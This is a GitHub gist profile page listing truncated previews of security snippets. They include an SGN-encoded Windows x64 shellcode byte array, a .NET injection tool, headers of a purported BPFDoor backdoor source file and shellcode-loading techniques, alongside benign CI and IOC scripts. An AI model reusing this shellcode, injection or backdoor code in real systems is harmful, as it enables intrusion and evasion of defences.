Skip to content

Instantly share code, notes, and snippets.

View EgeBalci's full-sized avatar
😎

Ege Balcı EgeBalci

😎
View GitHub Profile
#include <windows.h>
// SGN encoded windows/x64/exec shellcode
unsigned char shellcode[] = {
0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0xec, 0x5d,
0xeb, 0x01, 0xfc, 0xe8, 0x33, 0x01, 0x00, 0x00, 0x62, 0x6d, 0x91, 0x56,
0x51, 0x8b, 0xcb, 0x8a, 0x4d, 0xc2, 0x38, 0x67, 0x09, 0x00, 0x00, 0x15,
0x00, 0x45, 0x30, 0x1c, 0x0a, 0x45, 0x02, 0x1c, 0x0a, 0xe2, 0xf6, 0x44,
0xf2, 0xf9, 0x23, 0x12, 0xee, 0xa0, 0xdb, 0xbf, 0x8f, 0x67, 0xa7, 0xa7,
0xa7, 0x27, 0x44, 0x95, 0xd4, 0x60, 0xb0, 0xdd, 0x0b, 0x23, 0x92, 0xbe,
#!/bin/bash
curl -s rate.sx
@EgeBalci
EgeBalci / CI.yml
Created August 16, 2022 13:07 — forked from Tehnix/CI.yml
Ready to use Github workflow for cross-compiling a rust binary to many Linux architectures.
# Instruction + template repo: https://github.com/FedericoPonzi/rust-ci
name: CI
on:
pull_request:
push:
branches:
- master
tags:
- 'v*.*.*'
// Compile with g++ dotnet_injectbundle.cpp -o dotnet_injectbundle
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include "main.h"
// libcorclr.dll signature for finding hlpDynamicFuncTable
@EgeBalci
EgeBalci / bpfdoor.c
Created May 9, 2022 08:38
Red Menshen BPFDoor Source Code(?)
#include <arpa/inet.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <linux/termios.h>
@EgeBalci
EgeBalci / memBruteforce.cpp
Created December 8, 2021 15:13 — forked from aaaddress1/memBruteforce.cpp
Windows 32-bit Shellcode Design without TEB & fs:30h
// memBruteforce.cpp by [email protected]
// brute search loaded moudules in memory
// rewrite from https://www.exploit-db.com/exploits/45293
#include <Windows.h>
#include <iostream>
#pragma warning(disable:4996)
bool isMemExist(size_t addr) {
int retv;
__asm {
@EgeBalci
EgeBalci / LowUtilities.cpp
Created June 23, 2021 10:39 — forked from D4stiny/LowUtilities.cpp
A dependency-less implementation of GetModuleHandle and GetProcAddress.
//
// An implementation of GetModuleHandle and GetProcAddress that works with manually mapped modules, forwarded exports,
// without a CRT standard library, and uses no Windows API or dependencies.
//
// Author: Bill Demirkapi
// License: MIT, appended at the bottom of this document if you care about licensing and want to credit me in your own project.
//
#include <Windows.h>
#include <winternl.h>
@EgeBalci
EgeBalci / proof
Last active November 8, 2021 12:07
6e8934a7405afe5ee5a2d1749aa8a7e7ee5e2a24614fdc0ddbaaf1148fb1719c9be1fe5709037b8274aab95f56c8f3ce43aa2444f1316b86615772109c725bfd
5189f87772c940f18639e13b13444dddf77af2697d873de73375632596810dc5ba6730bf489eb9725e56d0a37752af9d26a53c8263cf8a817679713b430fef32
6571a5d957cf126a62f808d9edaedb0eccdd6240e594cd26ad4f46f3276a52790c6c4666aa93278d95299afb7151f5840bb9a51b84729753c53f2f6a847c0afd poc video
a869e187c12d4d9ef0ad6a636f22a89830bba2d44d1fcf46618d92a117593b77d2c97f4173cdd145c63704d93889a4b6f733bd31ec08f7762dbff1a985a04d6a poc video
@EgeBalci
EgeBalci / mk-csv-ioc.sh
Last active May 28, 2021 13:33
Create CSV formatted IOC
#!/bin/bash
if [ $# -eq 0 ]
then
echo "[*] Usage: $0 [FILE]"
exit
fi
echo "SHA256,SHA1,MD5,FILENAME"
for file in "$@"
@EgeBalci
EgeBalci / clr_via_native.c
Created August 6, 2020 05:16 — forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;